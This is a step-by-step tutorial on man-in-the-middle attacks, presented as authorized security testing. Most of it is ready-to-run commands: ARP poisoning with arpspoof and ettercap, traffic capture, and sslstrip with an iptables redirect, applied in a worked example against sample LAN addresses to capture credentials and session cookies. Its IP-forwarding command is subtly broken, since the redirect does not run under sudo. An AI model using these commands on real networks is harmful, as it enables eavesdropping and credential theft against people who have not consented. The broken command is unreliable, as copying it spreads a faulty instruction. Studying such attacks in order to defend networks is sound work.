On-Path / Man in the Middle Attacks

On-Path Attack (Man-in-the-Middle Attack)

Definition: An On-Path Attack, also known as a Man-in-the-Middle (MitM) attack, involves an attacker secretly intercepting and potentially altering the communication between two parties who believe they are directly communicating with each other. The attacker can eavesdrop, capture sensitive data, or inject malicious content into the communication stream.

Conducting an On-Path Attack

Steps to Conduct an On-Path Attack

1. Network Discovery:

   • Identify potential targets and gather information about the network.

   • Tools: Nmap, Netdiscover

2. ARP Spoofing/Poisoning:

   • Redirect traffic between the target and the router through the attacker’s machine.

   • Tools: arpspoof, ettercap, bettercap

3. Traffic Interception and Analysis:

   • Capture and analyze the intercepted traffic.

   • Tools: Wireshark, tcpdump

4. Traffic Manipulation:

   • Modify the intercepted traffic to inject malicious content or alter data.

   • Tools: mitmproxy, ettercap

5. Session Hijacking or Data Extraction:

   • Extract sensitive data such as login credentials, session cookies, or hijack active sessions.

   • Tools: sslstrip, Wireshark

Tools and Techniques

1. ARP Spoofing with arpspoof

Installation:

sudo apt-get install dsniff

Usage:

# Enable IP forwarding
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

# Start ARP spoofing
sudo arpspoof -i <interface> -t <target_ip> <gateway_ip>
sudo arpspoof -i <interface> -t <gateway_ip> <target_ip>

2. ARP Spoofing with ettercap

Installation:

sudo apt-get install ettercap-text-only

Usage:

# Launch ettercap in interactive mode
sudo ettercap -G

# Select unified sniffing
# Add targets (target and gateway)
# Start ARP poisoning (MitM attack)

3. Traffic Analysis with Wireshark

Installation:

sudo apt-get install wireshark

Usage:

# Launch Wireshark and start capturing traffic on the desired interface
sudo wireshark

4. SSL Stripping with sslstrip

Installation:

sudo apt-get install sslstrip

Usage:

# Start SSL stripping
sudo sslstrip -l 8080

# Redirect traffic to sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Example Workflow

1. Network Discovery:

   nmap -sn 192.168.1.0/24

2. ARP Spoofing:

   sudo echo 1 > /proc/sys/net/ipv4/ip_forward
   sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
   sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10

3. Traffic Analysis:

   sudo wireshark

4. SSL Stripping:

   sudo sslstrip -l 8080
   sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Ethical Considerations

• Authorization: Always obtain explicit permission from network owners before performing any MitM attacks.

• Controlled Environment: Conduct these tests in a controlled and isolated environment to prevent unintentional harm.

• Data Protection: Ensure that any intercepted data is handled securely and ethically, with no unauthorized access or disclosure.

References

1. Nmap Network Scanning: Nmap

2. ARP Spoofing with dsniff: dsniff

3. Ettercap for ARP Spoofing: Ettercap

4. Wireshark for Traffic Analysis: Wireshark

5. SSL Stripping with sslstrip: sslstrip

By following this guide responsibly, you can simulate On-Path Attacks to assess the security posture of networks and identify potential vulnerabilities, helping to strengthen overall security.